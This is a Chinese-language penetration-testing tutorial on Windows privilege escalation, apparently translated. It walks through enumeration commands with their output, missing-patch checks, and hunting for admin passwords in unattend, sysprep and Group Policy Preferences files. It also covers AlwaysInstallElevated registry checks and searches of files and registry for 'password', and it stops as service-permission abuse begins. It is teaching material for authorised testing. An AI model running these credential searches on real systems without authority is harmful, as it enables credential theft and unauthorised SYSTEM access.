Windows 权限提升基础知识

admin 2024年5月19日22:08:29评论25 views字数 35622阅读118分44秒阅读模式

Windows 权限提升基础知识

本文将深入探讨一个典型的 Windows 系统权限提升过程,并介绍在此过程中可能涉及的各种技术和步骤。从最初的信息收集和环境侦察开始,到利用 Windows 服务、计划任务和文件/文件夹权限漏洞,我们将逐步展示如何在渗透测试中执行权限提升攻击。

目录:

  • t1 到 t3 涉及初步的信息收集和基本的环境侦察。

  • t4 专注于使用 WMIC 工具进行深入的信息收集。

  • t5 到 t6 涉及快速查找明显的补丁安全漏洞。

  • t7 到 t10 涉及更复杂的操作,t7 阶段的重点在于利用 Windows 服务配置和权限漏洞进行权限提升

正文:

很少有人讨论严重的 Windows 权限提升问题,这真是遗憾。我认为原因可能是:

(1) 在渗透测试任务中,低权限的 shell 通常已经足够向客户证明存在漏洞。

(2) 在分阶段环境中,你经常会直接获取管理员账号。

(3) 使用 meterpreter 工具会让渗透测试人员变得懒惰。具体来说,meterpreter 有一个名为 `getsystem` 的命令,可以自动尝试提升权限到 SYSTEM 级别。由于这个命令非常简单和方便,渗透测试人员可能会依赖它,而不去深入了解或手动进行权限提升的过程。因此,`getsystem = 懒惰功夫` 表示使用 `getsystem` 命令会让人变得懒惰,不再花心思研究更复杂的权限提升方法。

(4) 构建审查通常最终变成了认证的 Nessus 扫描和 Microsoft 安全基线分析器...

与普遍的看法相反,如果 Windows 系统配置得当,可以非常安全。此外,打补丁的时间窗口很短。所以让我们深入挖掘 Windows 操作系统的黑暗角落,看看是否能获取 SYSTEM 权限。

需要注意的是,我将使用各种版本的 Windows 来展示可能存在的命令行差异。请记住,由于操作系统/服务包的不同,某些命令可能不存在或产生略有不同的输出。我试图将本教程结构化,以便它能在最普遍的情况下适用于 Windows 权限提升。

从 t0 到 t3 的阶段 - 初步信息收集

本教程的起点是获得目标机器上的一个低权限 shell。我们可能使用了远程漏洞利用或客户端攻击,从而获取了一个 shell。基本上,在 t0 时刻,我们对机器没有任何了解,不知道它的用途、连接情况、权限级别,甚至不知道它运行的是什么操作系统。

首先,我们需要迅速收集一些基本信息,以便了解当前的环境并评估我们的情况。

首先,让我们找出我们连接的操作系统:

C:Windowssystem32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"OS Name:                   Microsoft Windows 7 ProfessionalOS Version:                6.1.7601 Service Pack 1 Build 7601

接下来,我们将查看该机器的主机名以及我们当前连接的用户。

C:Windowssystem32> hostnameb33fC:Windowssystem32> echo %username%user1

现在我们有了这些基本信息,我们在框中列出了其他用户帐户,并更详细地查看我们自己的用户信息。我们已经可以看到 user1 不属于本地组管理员。

C:Windowssystem32> net usersUser accounts for \B33F-------------------------------------------------------------------------------Administrator            b33f                     Guestuser1The command completed successfully.C:Windowssystem32> net user user1User name                    user1Full NameCommentUser's commentCountry code                 000 (System Default)Account active               YesAccount expires              NeverPassword last set            1/11/2014 7:47:14 PMPassword expires             NeverPassword changeable          1/11/2014 7:47:14 PMPassword required            YesUser may change password     YesWorkstations allowed         AllLogon scriptUser profileHome directoryLast logon                   1/11/2014 8:05:09 PMLogon hours allowed          AllLocal Group Memberships      *UsersGlobal Group memberships     *NoneThe command completed successfully.

这就是我们目前需要了解的有关用户和权限的全部信息。我们列表中的下一个是网络,机器连接到什么以及它对这些连接施加什么规则。

首先让我们看一下可用的网络接口和路由表。

C:Windowssystem32> ipconfig /allWindows IP Configuration   Host Name . . . . . . . . . . . . : b33f   Primary Dns Suffix  . . . . . . . :   Node Type . . . . . . . . . . . . : Hybrid   IP Routing Enabled. . . . . . . . : No   WINS Proxy Enabled. . . . . . . . : NoEthernet adapter Bluetooth Network Connection:   Media State . . . . . . . . . . . : Media disconnected   Connection-specific DNS Suffix  . :   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)   Physical Address. . . . . . . . . : 0C-84-DC-62-60-29   DHCP Enabled. . . . . . . . . . . : Yes   Autoconfiguration Enabled . . . . : YesEthernet adapter Local Area Connection:   Connection-specific DNS Suffix  . :   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection   Physical Address. . . . . . . . . : 00-0C-29-56-79-35   DHCP Enabled. . . . . . . . . . . : Yes   Autoconfiguration Enabled . . . . : Yes   Link-local IPv6 Address . . . . . : fe80::5cd4:9caf:61c0:ba6e%11(Preferred)   IPv4 Address. . . . . . . . . . . : 192.168.0.104(Preferred)   Subnet Mask . . . . . . . . . . . : 255.255.255.0   Lease Obtained. . . . . . . . . . : Saturday, January 11, 2014 3:53:55 PM   Lease Expires . . . . . . . . . . : Sunday, January 12, 2014 3:53:55 PM   Default Gateway . . . . . . . . . : 192.168.0.1   DHCP Server . . . . . . . . . . . : 192.168.0.1   DHCPv6 IAID . . . . . . . . . . . : 234884137   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-18-14-24-1D-00-0C-29-56-79-35   DNS Servers . . . . . . . . . . . : 192.168.0.1   NetBIOS over Tcpip. . . . . . . . : EnabledC:Windowssystem32> route print===========================================================================Interface List 18...0c 84 dc 62 60 29 ......Bluetooth Device (Personal Area Network) 13...00 ff 0c 0d 4f ed ......TAP-Windows Adapter V9 11...00 0c 29 56 79 35 ......Intel(R) PRO/1000 MT Network Connection  1...........................Software Loopback Interface 1 16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter 15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2 19...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3 14...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface===========================================================================IPv4 Route Table===========================================================================Active Routes:Network Destination        Netmask          Gateway       Interface  Metric          0.0.0.0          0.0.0.0      192.168.0.1    192.168.0.104     10        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306      192.168.0.0    255.255.255.0         On-link     192.168.0.104    266    192.168.0.104  255.255.255.255         On-link     192.168.0.104    266    192.168.0.255  255.255.255.255         On-link     192.168.0.104    266        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306        224.0.0.0        240.0.0.0         On-link     192.168.0.104    266  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306  255.255.255.255  255.255.255.255         On-link     192.168.0.104    266===========================================================================Persistent Routes:  NoneIPv6 Route Table===========================================================================Active Routes: If Metric Network Destination      Gateway 14     58 ::/0                     On-link  1    306 ::1/128                  On-link 14     58 2001::/32                On-link 14    306 2001:0:5ef5:79fb:8d2:b4e:3f57:ff97/128                                    On-link 11    266 fe80::/64                On-link 14    306 fe80::/64                On-link 14    306 fe80::8d2:b4e:3f57:ff97/128                                    On-link 11    266 fe80::5cd4:9caf:61c0:ba6e/128                                    On-link  1    306 ff00::/8                 On-link 14    306 ff00::/8                 On-link 11    266 ff00::/8                 On-link===========================================================================Persistent Routes:  None# arp -A displays the ARP (Address Resolution Protocol) cache table for all available interfaces.C:Windowssystem32> arp -AInterface: 192.168.0.104 --- 0xb  Internet Address      Physical Address      Type  192.168.0.1           90-94-e4-c5-b0-46     dynamic  192.168.0.101         ac-22-0b-af-bb-43     dynamic  192.168.0.255         ff-ff-ff-ff-ff-ff     static  224.0.0.22            01-00-5e-00-00-16     static  224.0.0.251           01-00-5e-00-00-fb     static  224.0.0.252           01-00-5e-00-00-fc     static  239.255.255.250       01-00-5e-7f-ff-fa     static  255.255.255.255       ff-ff-ff-ff-ff-ff     static

接下来,我们将查看当前的网络连接和防火墙规则。

C:Windowssystem32> netstat -anoActive Connections  Proto  Local Address          Foreign Address        State           PID  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       684  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       1400  TCP    192.168.0.104:139      0.0.0.0:0              LISTENING       4  TCP    [::]:135               [::]:0                 LISTENING       684  TCP    [::]:445               [::]:0                 LISTENING       4  TCP    [::]:5357              [::]:0                 LISTENING       4  UDP    0.0.0.0:5355           *:*                                    1100  UDP    0.0.0.0:52282          *:*                                    976  UDP    0.0.0.0:55202          *:*                                    2956  UDP    0.0.0.0:59797          *:*                                    1400  UDP    127.0.0.1:1900         *:*                                    2956  UDP    127.0.0.1:65435        *:*                                    2956  UDP    192.168.0.104:137      *:*                                    4  UDP    192.168.0.104:138      *:*                                    4  UDP    192.168.0.104:1900     *:*                                    2956  UDP    192.168.0.104:5353     *:*                                    1400  UDP    192.168.0.104:65434    *:*                                    2956  UDP    [::]:5355              *:*                                    1100  UDP    [::]:52281             *:*                                    976  UDP    [::]:52283             *:*                                    976  UDP    [::]:55203             *:*                                    2956  UDP    [::]:59798             *:*                                    1400  UDP    [::1]:1900             *:*                                    2956  UDP    [::1]:5353             *:*                                    1400  UDP    [::1]:65433            *:*                                    2956  UDP    [fe80::5cd4:9caf:61c0:ba6e%11]:1900  *:*                      2956  UDP    [fe80::5cd4:9caf:61c0:ba6e%11]:65432  *:*                     2956# The following two netsh commands are examples of commands that are not universal across OS/SP. The netshfirewall commands are only available from XP SP2 and upwards.C:Windowssystem32> netsh firewall show stateFirewall status:-------------------------------------------------------------------Profile                           = StandardOperational mode                  = EnableException mode                    = EnableMulticast/broadcast response mode = EnableNotification mode                 = EnableGroup policy version              = Windows FirewallRemote admin mode                 = DisablePorts currently open on all network interfaces:Port   Protocol  Version  Program-------------------------------------------------------------------No ports are currently open on all network interfaces.C:Windowssystem32> netsh firewall show configDomain profile configuration:-------------------------------------------------------------------Operational mode                  = EnableException mode                    = EnableMulticast/broadcast response mode = EnableNotification mode                 = EnableAllowed programs configuration for Domain profile:Mode     Traffic direction    Name / Program-------------------------------------------------------------------Port configuration for Domain profile:Port   Protocol  Mode    Traffic direction     Name-------------------------------------------------------------------ICMP configuration for Domain profile:Mode     Type  Description-------------------------------------------------------------------Enable   2     Allow outbound packet too bigStandard profile configuration (current):-------------------------------------------------------------------Operational mode                  = EnableException mode                    = EnableMulticast/broadcast response mode = EnableNotification mode                 = EnableService configuration for Standard profile:Mode     Customized  Name-------------------------------------------------------------------Enable   No          Network DiscoveryAllowed programs configuration for Standard profile:Mode     Traffic direction    Name / Program-------------------------------------------------------------------Enable   Inbound              COMRaider / E:comraidercomraider.exeEnable   Inbound              nc.exe / C:usersb33fdesktopnc.exePort configuration for Standard profile:Port   Protocol  Mode    Traffic direction     Name-------------------------------------------------------------------ICMP configuration for Standard profile:Mode     Type  Description-------------------------------------------------------------------Enable   2     Allow outbound packet too bigLog configuration:-------------------------------------------------------------------File location   = C:Windowssystem32LogFilesFirewallpfirewall.logMax file size   = 4096 KBDropped packets = DisableConnections     = Disable

最后,我们将简要查看被攻陷机器上运行的内容:计划任务、运行中的进程、已启动的服务和已安装的驱动程序。

# This will display verbose output for all scheduled tasks, below you can see sample output for asingle task.C:Windowssystem32> schtasks /query /fo LIST /vFolder: MicrosoftWindows DefenderHostName:                             B33FTaskName:                             MicrosoftWindows DefenderMP Scheduled ScanNext Run Time:                        1/22/2014 5:11:13 AMStatus:                               ReadyLogon Mode:                           Interactive/BackgroundLast Run Time:                        N/ALast Result:                          1Author:                               N/ATask To Run:                          c:program fileswindows defenderMpCmdRun.exe Scan -ScheduleJob                                      -WinTask -RestrictPrivilegesScanStart In:                             N/AComment:                              Scheduled ScanScheduled Task State:                 EnabledIdle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutesPower Management:                     No Start On BatteriesRun As User:                          SYSTEMDelete Task If Not Rescheduled:       EnabledStop Task If Runs X Hours and X Mins: 72:00:00Schedule:                             Scheduling data is not available in this format.Schedule Type:                        DailyStart Time:                           5:11:13 AMStart Date:                           1/1/2000End Date:                             1/1/2100Days:                                 Every 1 day(s)Months:                               N/ARepeat: Every:                        DisabledRepeat: Until: Time:                  DisabledRepeat: Until: Duration:              DisabledRepeat: Stop If Still Running:        Disabled[..Snip..]# The following command links running processes to started services.C:Windowssystem32> tasklist /SVCImage Name                     PID Services========================= ======== ============================================System Idle Process              0 N/ASystem                           4 N/Asmss.exe                       244 N/Acsrss.exe                      332 N/Acsrss.exe                      372 N/Awininit.exe                    380 N/Awinlogon.exe                   428 N/Aservices.exe                   476 N/Alsass.exe                      484 SamSslsm.exe                        496 N/Asvchost.exe                    588 DcomLaunch, PlugPlay, Powersvchost.exe                    668 RpcEptMapper, RpcSssvchost.exe                    760 Audiosrv, Dhcp, eventlog,                                   HomeGroupProvider, lmhosts, wscsvcsvchost.exe                    800 AudioEndpointBuilder, CscService, Netman,                                   SysMain, TrkWks, UxSms, WdiSystemHost,                                   wudfsvcsvchost.exe                    836 AeLookupSvc, BITS, gpsvc, iphlpsvc,                                   LanmanServer, MMCSS, ProfSvc, Schedule,                                   seclogon, SENS, ShellHWDetection, Themes,                                   Winmgmt, wuauservaudiodg.exe                    916 N/Asvchost.exe                    992 EventSystem, fdPHost, netprofm, nsi,                                   WdiServiceHost, WinHttpAutoProxySvcsvchost.exe                   1104 CryptSvc, Dnscache, LanmanWorkstation,                                   NlaSvcspoolsv.exe                   1244 Spoolersvchost.exe                   1272 BFE, DPS, MpsSvcmDNSResponder.exe             1400 Bonjour Servicetaskhost.exe                  1504 N/Ataskeng.exe                   1556 N/Avmtoolsd.exe                  1580 VMToolsdwm.exe                       1660 N/Aexplorer.exe                  1668 N/Avmware-usbarbitrator.exe      1768 VMUSBArbServiceTPAutoConnSvc.exe             1712 TPAutoConnSvc[..Snip..]C:Windowssystem32> net startThese Windows services are started:   Application Experience   Application Information   Background Intelligent Transfer Service   Base Filtering Engine   Bluetooth Support Service   Bonjour Service   COM+ Event System   COM+ System Application   Cryptographic Services   DCOM Server Process Launcher   Desktop Window Manager Session Manager   DHCP Client   Diagnostic Policy Service   Diagnostic Service Host   Diagnostic System Host   Distributed Link Tracking Client   Distributed Transaction Coordinator   DNS Client   Function Discovery Provider Host   Function Discovery Resource Publication   Group Policy Client[..Snip..]# This can be useful sometimes as some 3rd party drivers, even by reputable companies, contain more holesthan Swiss cheese. This is only possible because ring0 exploitation lies outside most peoples expertise.C:Windowssystem32> DRIVERQUERYModule Name  Display Name           Driver Type   Link Date============ ====================== ============= ======================1394ohci     1394 OHCI Compliant Ho Kernel        11/20/2010 6:01:11 PMACPI         Microsoft ACPI Driver  Kernel        11/20/2010 4:37:52 PMAcpiPmi      ACPI Power Meter Drive Kernel        11/20/2010 4:47:55 PMadp94xx      adp94xx                Kernel        12/6/2008 7:59:55 AMadpahci      adpahci                Kernel        5/2/2007 1:29:26 AMadpu320      adpu320                Kernel        2/28/2007 8:03:08 AMAFD          Ancillary Function Dri Kernel        11/20/2010 4:40:00 PMagp440       Intel AGP Bus Filter   Kernel        7/14/2009 7:25:36 AMaic78xx      aic78xx                Kernel        4/12/2006 8:20:11 AMaliide       aliide                 Kernel        7/14/2009 7:11:17 AMamdagp       AMD AGP Bus Filter Dri Kernel        7/14/2009 7:25:36 AMamdide       amdide                 Kernel        7/14/2009 7:11:19 AMAmdK8        AMD K8 Processor Drive Kernel        7/14/2009 7:11:03 AMAmdPPM       AMD Processor Driver   Kernel        7/14/2009 7:11:03 AMamdsata      amdsata                Kernel        3/19/2010 9:08:27 AMamdsbs       amdsbs                 Kernel        3/21/2009 2:35:26 AMamdxata      amdxata                Kernel        3/20/2010 12:19:01 AMAppID        AppID Driver           Kernel        11/20/2010 5:29:48 PMarc          arc                    Kernel        5/25/2007 5:31:06 AM[..Snip..]

从 t4阶段开始 - WMIC 的奥秘

我想单独提一下 WMIC(Windows Management Instrumentation Command-Line),因为它是 Windows 最有用的命令行工具。WMIC 在信息收集和后期利用中非常实用。不过,它的操作有点笨拙,输出结果也不尽如人意。

全面解释 WMIC 的使用方法需要一整篇教程。更不用说,由于格式问题,有些输出结果很难展示。

以下列出了两个值得阅读的资源:

Command-Line Ninjitsu (SynJunkie) - [here](https://synjunkie.blogspot.com/2008/09/command-line-ninjitsu-4-wmic.html)Windows WMIC Command Line (ComputerHope) - [here](https://www.computerhope.com/wmic.htm)

不幸的是,一些默认配置的 Windows 不允许访问 WMIC,除非用户在 Administrators 组中(这可能是一个很好的安全措施)。根据我在虚拟机上的测试,我注意到任何版本的 XP 都不允许低权限账户访问 WMIC。相反,默认安装的 Windows 7 Professional 和 Windows 8 Enterprise 允许低权限用户使用 WMIC 并查询操作系统,而无需修改任何设置。这正是我们需要的,因为我们使用 WMIC 来收集目标机器的信息。

为了让你了解 WMIC 的广泛选项,我列出了可用的命令行开关。

C:Windowssystem32> wmic /?[global switches] The following global switches are available:/NAMESPACE           Path for the namespace the alias operate against./ROLE                Path for the role containing the alias definitions./NODE                Servers the alias will operate against./IMPLEVEL            Client impersonation level./AUTHLEVEL           Client authentication level./LOCALE              Language id the client should use./PRIVILEGES          Enable or disable all privileges./TRACE               Outputs debugging information to stderr./RECORD              Logs all input commands and output./INTERACTIVE         Sets or resets the interactive mode./FAILFAST            Sets or resets the FailFast mode./USER                User to be used during the session./PASSWORD            Password to be used for session login./OUTPUT              Specifies the mode for output redirection./APPEND              Specifies the mode for output redirection./AGGREGATE           Sets or resets aggregate mode./AUTHORITY           Specifies the  for the connection./?[:<BRIEF|FULL>]    Usage information.For more information on a specific global switch, type: switch-name /?The following alias/es are available in the current role:ALIAS                    - Access to the aliases available on the local systemBASEBOARD                - Base board (also known as a motherboard or system board) management.BIOS                     - Basic input/output services (BIOS) management.BOOTCONFIG               - Boot configuration management.CDROM                    - CD-ROM management.COMPUTERSYSTEM           - Computer system management.CPU                      - CPU management.CSPRODUCT                - Computer system product information from SMBIOS.DATAFILE                 - DataFile Management.DCOMAPP                  - DCOM Application management.DESKTOP                  - User's Desktop management.DESKTOPMONITOR           - Desktop Monitor management.DEVICEMEMORYADDRESS      - Device memory addresses management.DISKDRIVE                - Physical disk drive management.DISKQUOTA                - Disk space usage for NTFS volumes.DMACHANNEL               - Direct memory access (DMA) channel management.ENVIRONMENT              - System environment settings management.FSDIR                    - Filesystem directory entry management.GROUP                    - Group account management.IDECONTROLLER            - IDE Controller management.IRQ                      - Interrupt request line (IRQ) management.JOB                      - Provides  access to the jobs scheduled using the schedule service.LOADORDER                - Management of system services that define execution dependencies.LOGICALDISK              - Local storage device management.LOGON                    - LOGON Sessions.MEMCACHE                 - Cache memory management.MEMORYCHIP               - Memory chip information.MEMPHYSICAL              - Computer system's physical memory management.NETCLIENT                - Network Client management.NETLOGIN                 - Network login information (of a particular user) management.NETPROTOCOL              - Protocols (and their network characteristics) management.NETUSE                   - Active network connection management.NIC                      - Network Interface Controller (NIC) management.NICCONFIG                - Network adapter management.NTDOMAIN                 - NT Domain management.NTEVENT                  - Entries in the NT Event Log.NTEVENTLOG               - NT eventlog file management.ONBOARDDEVICE            - Management of common adapter devices built into the motherboard (system board).OS                       - Installed Operating System/s management.PAGEFILE                 - Virtual memory file swapping management.PAGEFILESET              - Page file settings management.PARTITION                - Management of partitioned areas of a physical disk.PORT                     - I/O port management.PORTCONNECTOR            - Physical connection ports management.PRINTER                  - Printer device management.PRINTERCONFIG            - Printer device configuration management.PRINTJOB                 - Print job management.PROCESS                  - Process management.PRODUCT                  - Installation package task management.QFE                      - Quick Fix Engineering.QUOTASETTING             - Setting information for disk quotas on a volume.RDACCOUNT                - Remote Desktop connection permission management.RDNIC                    - Remote Desktop connection management on a specific network adapter.RDPERMISSIONS            - Permissions to a specific Remote Desktop connection.RDTOGGLE                 - Turning Remote Desktop listener on or off remotely.RECOVEROS                - Information that will be gathered from memory when the operating system fails.REGISTRY                 - Computer system registry management.SCSICONTROLLER           - SCSI Controller management.SERVER                   - Server information management.SERVICE                  - Service application management.SHADOWCOPY               - Shadow copy management.SHADOWSTORAGE            - Shadow copy storage area management.SHARE                    - Shared resource management.SOFTWAREELEMENT          - Management of the  elements of a software product installed on a system.SOFTWAREFEATURE          - Management of software product subsets of SoftwareElement.SOUNDDEV                 - Sound Device management.STARTUP                  - Management of commands that run automatically when users log onto the computer                            system.SYSACCOUNT               - System account management.SYSDRIVER                - Management of the system driver for a base service.SYSTEMENCLOSURE          - Physical system enclosure management.SYSTEMSLOT               - Management of physical connection points including ports,  slots and                            peripherals, and proprietary connections points.TAPEDRIVE                - Tape drive management.TEMPERATURE              - Data management of a temperature sensor (electronic thermometer).TIMEZONE                 - Time zone data management.UPS                      - Uninterruptible power supply (UPS) management.USERACCOUNT              - User account management.VOLTAGE                  - Voltage sensor (electronic voltmeter) data management.VOLUME                   - Local storage volume management.VOLUMEQUOTASETTING       - Associates the disk quota setting with a specific disk volume.VOLUMEUSERQUOTA          - Per user storage volume quota management.WMISET                   - WMI service operational parameters management.For more information on a specific alias, type: alias /?CLASS     - Escapes to full WMI schema.PATH      - Escapes to full WMI object paths.CONTEXT   - Displays the state of all the global switches.QUIT/EXIT - Exits the program.For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?

简化起见,我创建了一个脚本,可以放置在目标机器上,并使用 WMIC 提取以下信息:进程、服务、用户账户、用户组、网络接口、硬盘信息、网络共享信息、安装的 Windows 补丁、启动时运行的程序、已安装软件列表、操作系统信息和时区信息。

我已经查看了各种标志和参数,以提取有价值的信息片段。如果有人认为应该添加到列表中的内容,请在下面留下评论。使用内置的输出功能,脚本将所有结果写入一个易于阅读的 HTML 文件。

你可以在这里下载我的脚本(wmic_info.bat)- [这里](https://example.com/wmic_info.bat)在一个 Windows 7 VM(补丁打得很差)上的示例输出文件- [这里](https://example.com/sample_output.html)

从 t5 到 t6 阶段 - 补丁漏洞

在继续之前,你应该花点时间回顾一下你迄今为止收集的信息,因为现在应该已经有相当多的信息了。我们游戏计划的下一步是寻找一些可以快速利用的补丁漏洞,以升级我们的用户权限。

我们首先需要查看的是补丁级别,这是最显而易见的。如果我们发现主机补丁打得很差,就没有必要继续担心了。我的 WMIC 脚本已经列出了所有安装的补丁,但你可以查看下面的示例命令行输出。

C:Windowssystem32> wmic qfe get Caption,Description,HotFixID,InstalledOnCaption                                     Description      HotFixID   InstalledOnhttp://support.microsoft.com/?kbid=2727528  Security Update  KB2727528  11/23/2013http://support.microsoft.com/?kbid=2729462  Security Update  KB2729462  11/26/2013http://support.microsoft.com/?kbid=2736693  Security Update  KB2736693  11/26/2013http://support.microsoft.com/?kbid=2737084  Security Update  KB2737084  11/23/2013http://support.microsoft.com/?kbid=2742614  Security Update  KB2742614  11/23/2013http://support.microsoft.com/?kbid=2742616  Security Update  KB2742616  11/26/2013http://support.microsoft.com/?kbid=2750149  Update           KB2750149  11/23/2013http://support.microsoft.com/?kbid=2756872  Update           KB2756872  11/24/2013http://support.microsoft.com/?kbid=2756923  Security Update  KB2756923  11/26/2013http://support.microsoft.com/?kbid=2757638  Security Update  KB2757638  11/23/2013http://support.microsoft.com/?kbid=2758246  Update           KB2758246  11/24/2013http://support.microsoft.com/?kbid=2761094  Update           KB2761094  11/24/2013http://support.microsoft.com/?kbid=2764870  Update           KB2764870  11/24/2013http://support.microsoft.com/?kbid=2768703  Update           KB2768703  11/23/2013http://support.microsoft.com/?kbid=2769034  Update           KB2769034  11/23/2013http://support.microsoft.com/?kbid=2769165  Update           KB2769165  11/23/2013http://support.microsoft.com/?kbid=2769166  Update           KB2769166  11/26/2013http://support.microsoft.com/?kbid=2770660  Security Update  KB2770660  11/23/2013http://support.microsoft.com/?kbid=2770917  Update           KB2770917  11/24/2013http://support.microsoft.com/?kbid=2771821  Update           KB2771821  11/24/2013[..Snip..]

像往常一样,对于 Windows,输出并不是完全准备好使用的。最好的策略是查找权限提升漏洞并查找它们对应的 KB 补丁编号。这些漏洞包括但不限于 KiTrap0D(KB979682)、MS11-011(KB2393802)、MS10-059(KB982799)、MS10-021(KB979683)、MS11-080(KB2592799)。在枚举操作系统版本和服务包之后,你应该查找可能存在的权限提升漏洞。使用 KB 补丁编号,你可以 grep 安装的补丁,看看是否有任何补丁缺失。

你可以查看下面的命令来 grep 补丁:

C:Windowssystem32> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

接下来我们将看一下批量部署。如果有许多机器需要安装,通常情况下,技术人员不会一个个地去处理每台机器。有几种方法可以自动安装机器。这些方法的具体原理并不是我们关注的重点,但主要的是它们会留下用于安装过程的配置文件。这些配置文件包含许多敏感信息,如操作系统产品密钥和管理员密码。我们最感兴趣的是管理员密码,因为我们可以使用它来提升权限。

通常这些是包含配置文件的目录(不过最好检查整个操作系统):

c:sysprep.infc:sysprepsysprep.xml%WINDIR%PantherUnattendUnattended.xml%WINDIR%PantherUnattended.xml

这些文件要么包含明文密码,要么以 Base64 编码的格式存在。你可以在下面看到一些示例文件输出。

# This is a sample from sysprep.inf with clear-text credentials.[GuiUnattended]OEMSkipRegional=1OemSkipWelcome=1AdminPassword=s3cr3tp4ssw0rdTimeZone=20# This is a sample from sysprep.xml with Base64 "encoded" credentials. Please people Base64 is notencryption, I take more precautions to protect my coffee. The password here is "SuperSecurePassword".<LocalAccounts>    <LocalAccount wcm:action="add">        <Password>            <Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>            <PlainText>false</PlainText>        </Password>        <Description>Local Administrator</Description>        <DisplayName>Administrator</DisplayName>        <Group>Administrators</Group>        <Name>Administrator</Name>    </LocalAccount></LocalAccounts># Sample from Unattended.xml with the same "secure" Base64 encoding.<AutoLogon>    <Password>        <Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>        <PlainText>false</PlainText>    </Password>    <Enabled>true</Enabled>    <Username>Administrator</Username></AutoLogon>

根据 Ben Campbell(@Meatballs__)的建议,我将组策略首选项保存的密码添加到快速失败列表中。组策略首选项文件可用于在域机器上创建本地用户。当你攻陷的计算机连接到域时,非常值得查找存储在 SYSVOL 中的 Groups.xml 文件。任何经过身份验证的用户都将对此文件具有读取访问权限。XML 文件中的密码通过使用 AES 加密“隐藏”了,但我说“隐藏”是因为静态密钥已经发布在 MSDN 网站上,使得存储的值易于解密。

Windows 权限提升基础知识

除了 Groups.xml 外,其他几个策略首选项文件也可以设置可选的 "cPassword" 属性:

ServicesServices.xml:特定元素属性ScheduledTasksScheduledTasks.xml:Task 内部元素、TaskV2 内部元素、ImmediateTaskV2 内部元素PrintersPrinters.xml:SharedPrinter 元素DrivesDrives.xml:特定元素属性DataSourcesDataSources.xml:特定元素属性

这个漏洞可以通过手动浏览 SYSVOL 并抓取相关文件来利用,如下所示。

Windows 权限提升基础知识

然而,我们都喜欢自动化解决方案,这样我们就可以尽快完成任务。这里有两个主要选项,取决于我们拥有的 shell/access 类型。一种是(1)通过已建立的会话执行的 metasploit 模块,另一种是(2)使用 Get-GPPPassword,它是 PowerSploit 的一部分。PowerSploit 是由 Matt Graeber 创建的优秀的 PowerShell 框架,专门用于逆向工程、取证和渗透测试。

接下来,我们将寻找一个奇怪的注册表设置“AlwaysInstallElevated”,如果启用了此设置,则允许任何权限级别的用户将 *.msi 文件安装为 NT AUTHORITYSYSTEM。我觉得这个想法很奇怪,你会创建低权限用户(限制他们对操作系统的使用),但却给他们以 SYSTEM 身份安装程序的能力。关于此问题的更多背景信息,你可以阅读 GreyHatHacker 的 Parvez 在一篇文章中报告的安全问题。

为了能够使用这个功能,我们需要检查两个注册表键是否设置正确,如果是这样,我们就可以弹出一个 SYSTEM shell。你可以查看查询相应注册表键的语法如下。

# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.C:Windowssystem32> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevatedC:Windowssystem32> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated

为了完成本节,我们将在操作系统上进行一些快速搜索,希望我们能找到宝藏。你可以看到我们搜索的语法如下。

# The command below will search the file system for file names containing certain keywords. You canspecify as many keywords as you wish.C:Windowssystem32> dir /s *pass* == *cred* == *vnc* == *.config*# Search certain file types for a keyword, this can generate a lot of output.C:Windowssystem32> findstr /si password *.xml *.ini *.txt# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".C:Windowssystem32> reg query HKLM /f password /t REG_SZ /sC:Windowssystem32> reg query HKCU /f password /t REG_SZ /s

从 t7 到 t10阶段 - 深入利用

希望到目前为止,我们已经拥有了一个 SYSTEM shell,但如果没有,仍然有几个攻击途径可以尝试。在这最后一部分,我们将查看 Windows 服务和文件/文件夹权限。我们的目标是利用弱权限来提升我们的会话权限。

我们将检查许多访问权限,所以我们应该获取 accesschk.exe 的副本,这是 Microsoft 的 Sysinternals 套件中的一个工具。Microsoft Sysinternals 包含了许多优秀的工具,遗憾的是 Microsoft 没有将它们添加到标准的 Windows 构建中。你可以从 Microsoft 技术网站上下载这个套件。

我们将从 Windows 服务开始,因为那里有一些快速胜利可找到。一般现代操作系统不会包含易受攻击的服务。在这种情况下,“易受攻击”意味着我们可以重新配置服务参数。Windows 服务有点像应用程序快捷方式,看看下面的示例。

# We can use sc to query, configure and manage windows services.C:Windowssystem32> sc qc Spooler[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Spooler        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:WindowsSystem32spoolsv.exe        LOAD_ORDER_GROUP   : SpoolerGroup        TAG                : 0        DISPLAY_NAME       : Print Spooler        DEPENDENCIES       : RPCSS                           : http        SERVICE_START_NAME : LocalSystem
我们可以使用 accesschk 来检查每个服务所需的权限级别。
